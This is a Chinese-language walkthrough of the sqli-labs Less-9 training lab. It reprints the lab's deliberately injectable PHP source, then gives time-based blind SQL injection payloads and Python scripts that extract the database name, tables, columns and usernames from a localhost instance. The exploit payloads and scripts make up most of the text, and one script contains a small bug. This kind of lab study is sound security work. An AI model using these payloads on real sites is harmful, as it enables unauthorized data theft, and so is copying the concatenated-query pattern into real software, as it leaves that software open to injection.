<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-9 Blind- Time based- Single Quotes- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-9.jpg" /></center>
</body>
</html>
从源码可以看出,无论我们的SQL注入在后端拼接的语句是否正确,都只会给我返回you are in.......这样的句子,所以不太符合布尔盲注的特征,就是有两个不一样的返回界面。
不过有时候他的界面虽然是一样的,不过他的Content-length是不一样的,可以通过这一点来进行布尔盲注。
#先判断是什么类型的注入
id=1 and sleep(5)--+
id=1' and sleep(5)--+
#看也页面的返回速度。可以知道是单引号注入。
#爆破数据库名长度
?id=1'and if(length(database())=8,sleep(5),1)--+
#爆破数据库名
?id=1' and if(ascii(substr(database(),{},1))={},sleep(5),1)--+
#爆破表个数
?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1)--+
#爆破表名长度:
?id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=6,sleep(5),1)--+
#爆破表名:
?id=1' and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+
#爆破列数
?id=1' and if( (select count(column_name) from information_schema.columns where table_name='users'and table_schema=database())=3,sleep(5),1)--+
#爆破列名长度:
?id=1' and if( length(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1))=2,sleep(5),1)--+
#爆破列名
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))=101,sleep(5),1)--+
#爆破数据条数
?id=1' and if((select count(username) from users)=13,sleep(5),1)--+
#爆破数据内容长度:
?id=1' and if(length(substr((select username from users limit 0,1),1))=4,sleep(5),1)--+
#爆破数据内容
?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))=101,sleep(5),1)--+
爆破数据库
import requests
import time
url="http://localhost/sqli-labs-master/Less-9/?id=1"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
response=requests.session()
database_length=1
for i in range(1,40):
payload_length="'and if(length(database())={},sleep(5),1)--+".format(i)
start_time=time.time()
response=requests.get(url+payload_length,headers=headers)
if time.time()-start_time>=3:
database_length=i
print("数据库名长度:{}".format(i))
break
else :
pass
database_name=""
for i in range(1,database_length+1):
for j in range(1,128):
payload="' and if(ascii(substr(database(),{},1))={},sleep(5),1)--+".format(i,j)
start_time=time.time()
response=requests.get(url+payload,headers=headers)
if time.time()-start_time>=3:
database_name=database_name+chr(j)
break
print("数据库名:",database_name)
爆破表的数量:
import requests
import time
url="http://localhost/sqli-labs-master/Less-9/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
for i in range(1,40):
payload="?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())={},sleep(5),1)--+".format(i)
start_time=time.time()
response=requests.get(url=url+payload,headers=headers)
if time.time()-start_time>=3:
print(i)
break
爆破表名:
import requests
import time
url="http://localhost/sqli-labs-master/Less-9/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
response=requests.session()
table_number=4
for i in range(0,table_number):
table_name=""
tablelen=1
for j in range(1,40):
payloadlen="?id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),1))={},sleep(5),1)--+".format(i,j)
start_time=time.time()
response=requests.get(url+payloadlen,headers=headers)
if time.time()-start_time>=3:
tablelen=j
print(tablelen)
break
for m in range(0,tablelen+1):
for n in range(1,128):
payload="?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={},sleep(5),1)--+".format(i,m,n)
start_time=time.time()
response=requests.get(url+payload,headers=headers)
if time.time()-start_time>=3:
table_name=table_name+chr(n)
break
print(table_name)
爆破列数:
import requests
import time
url="http://localhost/sqli-labs-master/Less-9/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
response=requests.session()
for i in range(1,40):
payload="?id=1' and if( (select count(column_name) from information_schema.columns where table_name='users'and table_schema=database())={},sleep(5),1)--+".format(i)
start_time=time.time()
response=requests.get(url+payload,headers=headers)
if time.time()-start_time>=3:
print(i)
break
爆破列名:
import requests
import time
url="http://localhost/sqli-labs-master/Less-9/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
response=requests.session()
column_number=3
for i in range(0,column_number):
column_name=""
for j in range(1,40):
payload_length="?id=1' and if( length(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit {},1),1))={},sleep(5),1)--+".format(i,j)
start_time=time.time()
response=requests.get(url+payload_length,headers=headers)
if time.time()-start_time>=3:
columnn_len=j
break
for m in range(1,columnn_len+1):
for n in range(1,128):
payload="?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit {},1),{},1))={},sleep(5),1)--+".format(i,m,n)
start_time=time.time()
response=requests.get(url+payload,headers=headers)
if time.time()-start_time>=3:
column_name+=chr(n)
break
print(column_name)爆破数据条数:
import requests
import time
url="http://localhost/sqli-labs-master/Less-9/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
response=requests.session()
for i in range(1,499):
payload_number="?id=1' and if((select count(username) from users)={},sleep(5),1)--+".format(i)
start_time=time.time()
response=requests.get(url+payload_number,headers=headers)
if time.time()-start_time>=3:
print(i)
break
爆破数据:
import requests
import time
url="http://localhost/sqli-labs-master/Less-9/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
response=requests.session()
Number=13
for i in range(0,Number):
name=""
for j in range(1,90):
payload_len="?id=1' and if(length(substr((select username from users limit {},1),1))={},sleep(5),1)--+".format(i,j)
start_time=time.time()
response=requests.get(url+payload_len,headers=headers)
if time.time()-start_time>=3:
length=j
print(length)
break
for m in range(1,length+1):
for n in range(1,128):
payload="?id=1' and if(ascii(substr((select username from users limit {},1),{},1))={},sleep(5),1)--+".format(i,m,n)
start_time=time.time()
response=requests.get(url+payload,headers==headers)
if time.time()-start_time>=3:
name+=chr(n)
break
print("第{}条数据".format(i+1),name)
因篇幅问题不能全部显示,请点此查看更多更全内容